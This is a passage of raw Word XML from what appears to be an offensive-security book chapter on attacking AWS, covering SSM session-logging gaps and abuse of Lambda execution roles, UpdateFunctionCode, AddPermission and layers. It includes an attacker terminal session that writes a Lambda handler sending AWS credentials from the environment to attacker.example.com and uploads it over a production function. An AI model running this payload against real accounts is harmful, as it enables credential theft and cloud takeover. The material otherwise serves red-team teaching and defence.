        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Warning: SSM session logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14199F39" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="1876042888"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">When an SSM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartSession</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is issued, CloudTrail records the event. But the session's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>input and output</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">are captured only if session-logging is explicitly configured to S3 or CloudWatch Logs in the account's Session Manager preferences. In roughly two-thirds of the engagements the authors have worked, session logging was not enabled at all, meaning the defender sees that a session started but has no record of what happened inside it. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>This is not a safe assumption to make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on any mature target — it is a condition to verify early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDFCFD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.5  Lambda: the execution role gold mine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDF40F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Every Lambda function has an execution role, and unlike an EC2 instance profile, the role is exposed to any code running inside the function through the environment variables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_ACCESS_KEY_ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_SECRET_ACCESS_KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AWS_SESSION_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. There is no IMDS flow. There is no PUT. The variables are literally there, in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, from the moment the function is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD03E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This means that any code execution in a Lambda function — a deserialization bug, a template injection, a path traversal that loads a Python module, a dependency-confusion attack that replaces a package — gives you the execution role instantly. The operational difference with EC2 is that the credentials' lifetime is much shorter (the Lambda runtime recycles environments aggressively) but the friction is zero.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B6E3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second Lambda surface is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:UpdateFunctionCode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. An identity with this permission against a Lambda function can replace the function's code with arbitrary code — the next invocation of that function, whether triggered by API Gateway, EventBridge, SQS, S3, or a direct </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Invoke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, will run the attacker's code under the function's execution role. If the execution role is IAM-rich (and it often is, because teams attach broad roles to Lambdas to "make things work"), the attacker has inherited it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1960F25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third Lambda surface is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is a resource-policy primitive: it adds a principal to the Lambda's resource policy, allowing that principal to invoke the function. The attacker can add their own principal, wait for the function to be invoked (often by a scheduled EventBridge rule), and then call the function on demand. Crucially, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not require </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>InvokeFunction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the time it is called, only at invocation time — and after the attacker has added themselves to the resource policy, they have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>InvokeFunction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> by definition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373E3885" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># we have lambda:UpdateFunctionCode on 'data-etl-prod'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690B0747" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; payload/lambda_function.py &lt;&lt;EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67231B23" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>import os, json, urllib.request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D50094" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>def lambda_handler(event, context):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E841910" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    env = { k: v for k,v in os.environ.items() if 'AWS' in k or 'SECRET' in k }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC258DA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    req = urllib.request.Request(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D75518" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'https://attacker.example.com/exf'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE878DF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        data=json.dumps(env).encode(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71E638" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">        headers={</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'content-type'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'application/json'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E99B8B3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    urllib.request.urlopen(req, timeout=5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F9A5E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'statusCode'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: 200, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'body'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'ok'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE20534" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEE7BE0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@kali</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (cd payload &amp;&amp; zip -r ../payload.zip .)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77130DFF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>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lambda update-function-code \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310CF6BC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>--function-name data-etl-prod --zip-file fileb://payload.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596250F4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC8857F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"FunctionName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"data-etl-prod"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B61F58" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Runtime"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"python3.11"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD5460" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Role"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"arn:aws:iam::111122223333:role/data-etl-exec"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFAC5CF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"LastModified"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"2026-04-20T14:22:05.000+0000"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B83755B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"State"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Active"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A1846" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"LastUpdateStatus"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"Successful"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C204C8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="2026128980"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363E2DD8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>10.6  Lambda layers and the dependency-confusion angle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A71925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Lambda layers are reusable code bundles that multiple functions can import. They create a supply-chain surface: if a function imports a layer that an attacker controls, the attacker controls the function's runtime. Two attack classes matter. First, if the attacker holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:PublishLayerVersion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, they can publish a new version of an existing layer — but existing functions pin to a specific version ARN, so a new version alone does not compromise them. The attacker must also hold </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:UpdateFunctionConfiguration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
